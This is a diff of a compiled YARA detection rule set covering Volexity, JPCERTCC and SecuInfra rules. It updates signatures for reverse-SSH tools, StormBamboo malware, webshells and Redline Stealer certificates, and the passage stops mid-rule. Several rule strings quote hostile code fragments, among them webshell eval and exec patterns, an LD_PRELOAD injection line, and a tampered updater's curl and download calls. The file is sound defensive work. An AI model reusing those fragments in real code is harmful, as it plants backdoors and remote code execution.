 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6615
-		version = 3
+		rule_id = 10424
+		version = 4
 
 	strings:
-		$s1 = "CONNECT" ascii fullword
-		$s2 = "DISCONNECT" ascii fullword
-		$s3 = "socket_" ascii fullword
-		$s4 = "targetIP" ascii fullword
-		$s5 = "targetPort" ascii fullword
-		$s6 = "socketHash" ascii fullword
-		$s7 = "extraData" ascii fullword
+		$proj_1 = "/home/jarischf/"
 
 	condition:
-		all of them
+		any of ( $proj_* )
 }
-rule VOLEXITY_Malware_Golang_Pantegana : FILE MEMORY
+rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY
 {
 	meta:
-		description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability."
+		description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity."
 		author = "threatintel@volexity.com"
-		id = "b6154165-68e0-5986-a0cf-5631d369c230"
-		date = "2022-03-30"
-		modified = "2025-03-21"
-		reference = "https://github.com/elleven11/pantegana"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L89-L119"
+		id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2"
+		date = "2024-04-10"
+		modified = "2024-04-12"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L82-L116"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b"
+		logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8"
 		score = 75
 		quality = 80
 		tags = "FILE, MEMORY"
-		hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0"
+		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
 		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6631
-		version = 3
+		rule_id = 10423
+		version = 5
 
 	strings:
-		$s1 = "RunFingerprinter" ascii
-		$s2 = "SendSysInfo" ascii
-		$s3 = "ExecAndGetOutput" ascii
-		$s4 = "RequestCommand" ascii
-		$s5 = "bindataRead" ascii
-		$s6 = "RunClient" ascii
-		$magic = "github.com/elleven11/pantegana" ascii
+		$fun_1 = "createLocalPortForwardingCallback"
+		$fun_2 = "createReversePortForwardingCallback"
+		$fun_3 = "createPasswordHandler"
+		$fun_4 = "createPublicKeyHandler"
+		$fun_5 = "createSFTPHandler"
+		$fun_6 = "dialHomeAndListen"
+		$fun_7 = "createExtraInfoHandler"
+		$fun_8 = "createSSHSessionHandler"
+		$fun_9 = "createReversePortForwardingCallback"
+		$proj_1 = "github.com/Fahrj/reverse-ssh"
 
 	condition:
-		5 of ( $s* ) or $magic
+		any of ( $proj_* ) or 4 of ( $fun_* )
 }
-rule VOLEXITY_Malware_Any_Pupyrat_B : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Any_Reloadext_Plugin : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python."
+		description = "Detection for RELOADEXT, a Google Chrome extension malware."
 		author = "threatintel@volexity.com"
-		id = "ec8d0448-f47d-5c6e-bcf9-8f40ae83a96f"
-		date = "2022-04-07"
-		modified = "2025-03-21"
-		reference = "https://github.com/n1nj4sec/pupy"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L120-L157"
+		id = "6c6c8bee-2a13-5645-89ef-779f00264fd9"
+		date = "2024-02-23"
+		modified = "2024-08-02"
+		reference = "TIB-20240227"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L4-L36"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "f5b5f35ee783ff1163072591c6d48a85894729156935650a0fd166ae22a2ea00"
+		logic_hash = "2b11f8fc5b6260ebf00bde83585cd7469709a4979ca579cdf065724bc15052fc"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4"
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "9d0928b3cc21ee5e1f2868f692421165f46b5014a901636c2a2b32a4c500f761"
 		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6689
+		rule_id = 10282
 		version = 4
 
 	strings:
-		$elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii
-		$elf2 = "reflective_inject_dll" fullword ascii
-		$elf3 = "ld_preload_inject_dll" fullword ascii
-		$pupy1 = "_pupy.error" ascii
-		$pupy2 = "pupy://" ascii
-		$s1 = "Args not passed" ascii
-		$s2 = "Too many args" ascii
-		$s3 = "Can't execute" ascii
-		$s4 = "mexec:stdin" ascii
-		$s5 = "mexec:stdout" ascii
-		$s6 = "mexec:stderr" ascii
-		$s7 = "LZMA error" ascii
+		$man1 = "Reload page with Internet Explorer compatible mode."
+		$man2 = "\"http://*/*\""
+		$code1 = ";chrome["
+		$code2 = "XMLHttpRequest(),_"
+		$code3 = "0x400*0x400"
 
 	condition:
-		any of ( $elf* ) or all of ( $pupy* ) or all of ( $s* )
+		all of ( $man* ) or ( #code1 > 8 and #code2 >= 2 and #code3 >= 2 )
 }
-rule VOLEXITY_Susp_Php_Fileinput_Eval : FILE
+rule VOLEXITY_Apt_Malware_Macos_Reloadext_Installer : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Rule designed to detect PHP files which use file_get_contents() and then shortly afterwards use an eval statement."
+		description = "Detect the RELOADEXT installer."
 		author = "threatintel@volexity.com"
-		id = "3e311677-22ea-5e5f-bdc6-dd67033d25a6"
-		date = "2021-06-16"
-		modified = "2024-12-12"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L158-L181"
+		id = "c65ea2b5-ab98-5693-92ea-05c0f1ea1e5b"
+		date = "2024-02-23"
+		modified = "2024-08-02"
+		reference = "TIB-20240227"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L37-L62"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "de376bfdfa5b6244c414454cb5d43d29e3dd75e049389f0c430c160f9d198965"
-		score = 65
+		logic_hash = "8688796839202d95ded15e10262a7a7c7cbbae4a332b60305402e5984005d452"
+		score = 75
 		quality = 80
-		tags = "FILE"
-		hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5"
-		hash2 = "6e8874c756c009c63f715a44ca72d0cb31dc25d87d7df6ca2830fe8330580342"
-		os = "win,linux"
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "07e3b067dc5e5de377ce4a5eff3ccd4e6a2f1d7a47c23fe06b1ededa7aed1ab3"
+		os = "darwin"
 		os_arch = "all"
-		scan_context = "file"
-		severity = "high"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5581
-		version = 5
+		rule_id = 10281
+		version = 2
 
 	strings:
-		$s1 = "file_get_contents(\"php://input\")"
-		$s2 = "eval("
+		$str1 = "/CustomPlug1n/"
+		$str2 = "Chrome NOT installed."
+		$str3 = "-f force kill Chrome"
+		$str4 = "/*} &&cp -rf ${"
 
 	condition:
-		$s2 in ( @s1 [ 1 ] .. ( @s1 [ 1 ] + 512 ) )
+		3 of them
 }
-rule VOLEXITY_Susp_Php_Call_User_Func : FILE
+rule VOLEXITY_Apt_Malware_Any_Macma_A : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Webshells using call_user_func() function against an object from a file input or POST variable."
+		description = "Detects variants of the MACMA backdoor, variants of MACMA have been discovered for macOS and android."
 		author = "threatintel@volexity.com"
-		id = "48c7857e-7dda-5e3f-b82c-7d34c251f083"
-		date = "2021-06-16"
-		modified = "2024-07-30"
-		reference = "https://zhuanlan.zhihu.com/p/354906657"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L182-L204"
+		id = "6ab45af1-41e5-53fc-9297-e2bc07ebf797"
+		date = "2021-11-12"
+		modified = "2024-08-02"
+		reference = "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L63-L111"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea"
-		score = 65
-		quality = 80
-		tags = "FILE"
-		hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252"
-		os = "win,linux"
+		logic_hash = "7ebaff9fddf6491d6b1ed9ab14c1b87dc8df850536e55aa723d625a593b33ed7"
+		score = 75
+		quality = 53
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "cf5edcff4053e29cb236d3ed1fe06ca93ae6f64f26e25117d68ee130b9bc60c8"
+		hash2 = "9b71fad3280cf36501fe110e022845b29c1fb1343d5250769eada7c36bc45f70"
+		hash3 = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a"
+		hash4 = "d599d7814adbab0f1442f5a10074e00f3a776ce183ea924abcd6154f0d068bb4"
+		os = "all"
 		os_arch = "all"
-		scan_context = "file"
-		severity = "high"
+		report1 = "TIB-20231221"
+		report2 = "TIB-20240227"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5582
-		version = 4
+		rule_id = 6114
+		version = 9
 
 	strings:
-		$s1 = "@call_user_func(new C()" wide ascii
+		$magic1 = "curl -o %s http://cgi1.apnic.net/cgi-bin/my-ip.php" fullword ascii
+		$magic2 = "[FST%d]: WhyUserCancel UNKNOW: %d" fullword ascii
+		$magic3 = "[FST%d]: wait C2 prepare ready TIMEOUT, fd: %d" fullword ascii
+		$magic4 = "[FST%d]: wait C2 ack file content TIMEOUT, fd: %d" fullword ascii
+		$magic5 = "[FST%d]: TIMER_CHECK_CANCEL WhyUserCancel UNKNOW: %d" fullword ascii
+		$magic6 = "[FST%d]: encrypt file info key=%s, crc v1=0x%p, v2=0x%p" fullword ascii
+		$s1 = "auto bbbbbaaend:%d path %s" fullword ascii
+		$s2 = "0keyboardRecirderStopv" fullword ascii
+		$s3 = "curl begin..." fullword ascii
+		$s4 = "curl over!" fullword ascii
+		$s5 = "kAgent fail" fullword ascii
+		$s6 = "put !!!!" fullword ascii
+		$s7 = "vret!!!!!! %d" fullword ascii
+		$s8 = "save Setting Success" fullword ascii
+		$s9 = "Start Filesyste Search." fullword ascii
+		$s10 = "./SearchFileTool" fullword ascii
+		$s11 = "put unknow exception in MonitorQueue" fullword ascii
+		$s12 = "./netcfg2.ini" fullword ascii
+		$s13 = ".killchecker_" fullword ascii
+		$s14 = "./param.ini" fullword ascii
 
 	condition:
-		$s1
+		any of ( $magic* ) or 7 of ( $s* )
 }
-rule VOLEXITY_Webshell_Jsp_Godzilla : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Dustpan_Apihashes : STORMBAMBOO FILE
 {
 	meta:
-		description = "Detects the JSP implementation of the Godzilla Webshell."
+		description = "Detects DUSTPAN malware using API hashes used to resolve functions at runtime."
 		author = "threatintel@volexity.com"
-		id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7"
-		date = "2021-11-08"
-		modified = "2024-07-30"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L34"
+		id = "ed275da4-cd95-5fa3-a568-e610fb405bb3"
+		date = "2023-08-17"
+		modified = "2024-08-02"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L171-L205"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3"
+		logic_hash = "3edb66ade428c451c18aa152244f869f9f8c10e62ed942bf722b4d1cf1893e93"
 		score = 75
-		quality = 55
-		tags = "FILE, MEMORY"
-		hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe"
-		os = "win,linux"
+		quality = 80
+		tags = "STORMBAMBOO, FILE"
+		hash1 = "b77bcfb036f5a6a3973fdd68f40c0bd0b19af1246688ca4b1f9db02f2055ef9d"
+		os = "win"
 		os_arch = "all"
-		scan_context = "file,memory"
+		report1 = "MAR-20230818"
+		report2 = "TIB-20231221"
+		scan_context = "file"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6100
-		version = 6
+		rule_id = 9591
+		version = 3
 
 	strings:
-		$s1 = ".getWriter().write(base64Encode(" wide ascii
-		$s2 = ".getAttribute(" ascii wide
-		$s3 = "java.security.MessageDigest" ascii wide
-		$auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide
-		$auth2 = "String pass=\"" ascii wide
-		$magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q"
-		$magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class"
+		$h1 = {9c 5b 9f 0b}
+		$h2 = {4c 8f 3e 08}
+		$h3 = {b4 aa f2 06}
+		$h4 = {dc cb ca 09}
+		$h5 = {d4 33 07 0e}
+		$h6 = {27 89 d6 0a}
+		$h7 = {b5 7d ae 09}
+		$h8 = {4e 64 eb 0b}
+		$h9 = {be 17 d9 08}
+		$magic = "SMHM"
 
 	condition:
-		all of ( $s* ) or all of ( $auth* ) or any of ( $magic* )
+		6 of ( $h* ) and $magic
 }
-rule VOLEXITY_Susp_Jsp_General_Runtime_Exec_Req : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Pocostick_Jul23 : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Looks for a common design pattern in webshells where a request attribute is passed as an argument to exec()."
+		description = "Detects the July 2023 POCOSTICK variant. These strings are only visible in memory after several rounds of shellcode decryption."
 		author = "threatintel@volexity.com"
-		id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13"
-		date = "2022-02-02"
-		modified = "2024-07-30"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L35-L56"
+		id = "9632a7fc-06da-58b4-b95c-b46aeb9dd41d"
+		date = "2023-07-24"
+		modified = "2024-08-02"
+		reference = "TIB-20231221"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L206-L235"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8"
-		score = 65
+		logic_hash = "19487db733c7f793be2a1287df32a165e46f6af0e940b13b389f4d675b5100c4"
+		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15"
-		os = "win,linux"
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "ec3e787c369ac4b28447e7cacc44d70a595e39d47f842bacb07d19b12cab6aad"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6450
+		rule_id = 9542
 		version = 3
 
 	strings:
-		$s1 = "Runtime.getRuntime().exec(request." ascii
+		$str1 = "Folder PATH listing form volume" wide
+		$str2 = "Volume serial number is 0000-1111" wide
+		$str3 = "Type:Error" wide
+		$str4 = "Type:Desktop" wide
+		$str5 = "Type:Laptop" wide
+		$str6 = "Type:Vitual" wide
+		$str7 = ".unicode.tmp" wide
+		$str8 = "EveryOne" wide
 
 	condition:
-		$s1
+		6 of them
 }
-rule VOLEXITY_Webshell_Jsp_Regeorg : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Py_Dustpan_Pyloader : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects the reGeorg webshells' JSP version."
+		description = "Detects Python script used by KPlayer to update, modified by attackers to download a malicious payload."
 		author = "threatintel@volexity.com"
-		id = "205ee383-4298-5469-a509-4ce3eaf9dd0e"
-		date = "2022-03-08"
-		modified = "2024-09-20"
-		reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L57-L86"
+		id = "446d2eef-c60a-50ed-9ff1-df86b6210dff"
+		date = "2023-07-21"
+		modified = "2024-08-02"
+		reference = "TIB-20231221"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L236-L270"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e"
+		logic_hash = "bb3a70dad28181534e27abbbd618165652c137264bfd3726ae4480c642493a3b"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845"
-		os = "win"
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6575
-		version = 5
+		rule_id = 9530
+		version = 4
 
 	strings:
-		$magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii
-		$a1 = ".connect(new InetSocketAddress" ascii
-		$a2 = ".configureBlocking(false)" ascii
-		$a3 = ".setHeader(" ascii
-		$a4 = ".getHeader(" ascii
-		$a5 = ".flip();" ascii
+		$s_1 = "def count_md5(src)"
+		$s_2 = "urllib.request.urlretrieve(image_url,main)"
+		$s_3 = "m1 != '4c8a326899272d2fe30e818181f6f67f'"
+		$s_4 = "os.path.split(os.path.realpath(__file__))[0]"
+		$s_5 = "r_v = os.system('curl '+ini_url+cc)"
+		$s_6 = "b41ef5f591226a0d5adce99cb2e629d8"
+		$s_7 = "1df495e7c85e59ad0de1b9e50912f8d0"
+		$s_8 = "tasklist | findstr mediainfo.exe"
+		$url_1 = "http://dl1.5kplayer.com/youtube/youtube_dl.png"
+		$url_2 = "http://dl1.5kplayer.com/youtube/youtube.ini?fire="
+		$path_1 = "C:\\\\ProgramData\\\\Digiarty\\\\mediainfo.exe"
 
 	condition:
-		$magic or all of ( $a* )
+		3 of ( $s_* ) or any of ( $url_* ) or $path_1
 }
-rule VOLEXITY_Apt_Malware_Win_Gimmick_Dotnet_Base : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Malware_Elf_Catchdns_Aug20_Memory : DRIFTINGBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects the base version of GIMMICK written in .NET."
+		description = "Looks for strings from CatchDNS component used to intercept and modify DNS responses, and likely also intercept/monitor http. This rule would only match against memory in the example file analyzed by Volexity."
 		author = "threatintel@volexity.com"
-		id = "be42d85f-3143-51d3-b148-95d0ae666771"
-		date = "2020-03-16"
-		modified = "2024-08-19"
+		id = "95306735-cdae-5407-ad49-d465d245378d"
+		date = "2020-08-20"
+		modified = "2024-08-02"
 		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-03-22 GIMMICK/indicators/yara.yar#L60-L86"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L309-L383"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "39a38ea189d5e840f9334cb7ec8f390444139b39c6f426906a8845f9a1ada9f7"
+		hash = "4f3d35f4f8b810362cbd4c59bfe5a961e559fe5713c9478294ccb3af2d306515"
+		logic_hash = "a7d677d7eecf388df7e7c2343fd3e46188594473c01075bf8a0b54292a51db94"
 		score = 75
-		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234"
-		os = "win"
+		quality = 55
+		tags = "DRIFTINGBAMBOO, FILE, MEMORY"
+		os = "linux"
 		os_arch = "all"
+		report1 = "MAR-20221222"
+		report2 = "TIB-20231221"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6628
-		version = 3
+		rule_id = 227
+		version = 10
 
 	strings:
-		$other1 = "srcStr is null" wide
-		$other2 = "srcBs is null " wide
-		$other3 = "Key cannot be null" wide
-		$other4 = "Faild to get target constructor, targetType=" wide
-		$other5 = "hexMoudule(public key) cannot be null or empty." wide
-		$other6 = "https://oauth2.googleapis.com/token" wide
+		$os1 = "current thread policy=%d" ascii wide
+		$os2 = "OS_CreatShareMem %s-->%x" ascii wide
+		$os3 = "sem_open fail" ascii wide
+		$os4 = "int OS_GetCurRunPath(char*, int)" ascii wide
+		$os5 = "int OS_GetCurModName(char*, int)" ascii wide
+		$os6 = "int OS_StrToTime(char*, time_t*)" ascii wide
+		$os7 = "int OS_TimeToStr(time_t, char*)" ascii wide
+		$os8 = "int OS_TimeToStrYearMothDay(time_t, char*)" ascii wide
+		$os9 = "bool OS_Access(const char*)" ascii wide
+		$os10 = "int OS_Memicmp(const void*, const void*, unsigned int)" ascii wide
+		$os11 = "int OS_Mkdir(char*)" ascii wide
+		$os12 = "OS_ConnectSem" ascii wide
+		$msg1 = "client: last send packet iseq: %x, the ack :%x" ascii wide
+		$msg2 = "server: last send packet iseq: %x, the iseq :%x" ascii wide
+		$msg3 = "send packet failed!" ascii wide
+		$msg4 = "will hijack dns:%s, ip:%s " ascii wide
+		$msg5 = "dns send ok:%s" ascii wide
+		$msg6 = "tcp send ok" ascii wide
+		$msg7 = "FilePath:%s;" ascii wide
+		$msg8 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide
+		$msg9 = "Description:%s;" ascii wide
+		$msg10 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide
+		$msg11 = "get msg from ini is error" ascii wide
+		$msg12 = "on build eth send_msg or payload is null" ascii wide
+		$msg13 = "on build udp send_msg or payload is null" ascii wide
+		$conf1 = "%d.%d.%d.%d" ascii wide
+		$conf2 = "%s.tty" ascii wide
+		$conf3 = "dns.ini" ascii wide
+		$netw1 = "LISTEN_DEV" ascii wide
+		$netw2 = "SEND_DEV" ascii wide
+		$netw3 = "SERVER_IP" ascii wide
+		$netw4 = "DNSDomain" ascii wide
+		$netw5 = "IpLimit" ascii wide
+		$netw6 = "HttpConfig" ascii wide
+		$netw7 = "buildhead" ascii wide
+		$netw8 = "sendlimit" ascii wide
+		$netw9 = "content-type" ascii wide
+		$netw10 = "otherhead_" ascii wide
+		$netw11 = "configfile" ascii wide
+		$apache = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 25 73 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A}
+		$cpp1 = "src/os.cpp"
+		$cpp2 = "src/test_catch_dns.cpp"
 
 	condition:
-		5 of ( $other* )
+		9 of ( $os* ) or 3 of ( $msg* ) or all of ( $conf* ) or all of ( $netw* ) or $apache or all of ( $cpp* )
 }
 /*
  * YARA Rule Set
  * Repository Name: JPCERTCC
  * Repository: https://github.com/JPCERTCC/MalConfScan/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 19ec0d145535a6a4cfd37c0960114f455a8c343e
  * Number of Rules: 30
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -157643,7 +158233,7 @@ rule JPCERTCC_Elf_Wellmess : FILE
  * YARA Rule Set
  * Repository Name: SecuInfra
  * Repository: https://github.com/SIFalcon/Detection
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd
  * Number of Rules: 45
  * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
@@ -157653,449 +158243,167 @@ rule JPCERTCC_Elf_Wellmess : FILE
  *
  * NO LICENSE SET
  */
-
-rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE
-{
-	meta:
-		description = "Detects Certificate used by Redline Stealer"
-		author = "SECUINFRA Falcon Team"
-		id = "a91d0510-ab4e-5f22-bcce-9a42beff5190"
-		date = "2022-12-02"
-		modified = "2022-02-13"
-		reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16"
-		license_url = "N/A"
-		logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures [ i ] . serial == "72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11" )
-}
-
-rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE
-{
-	meta:
-		description = "Detects Certificate used by Redline Stealer"
-		author = "SECUINFRA Falcon Team"
-		id = "70081810-704e-5734-8a78-f97e17989460"
-		date = "2022-02-13"
-		modified = "2022-02-13"
-		reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31"
-		license_url = "N/A"
-		logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures [ i ] . serial == "11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54" )
-}
-rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD
-{
-	meta:
-		description = "Detect a Download to %temp% and execution with rundll32.exe"
-		author = "SECUINFRA Falcon Team"
